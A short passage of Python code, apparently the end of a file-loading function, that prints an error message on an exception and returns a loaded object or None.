except Exception as e:
print ("Error loading file %s" % e)
if fr:
return fr
return None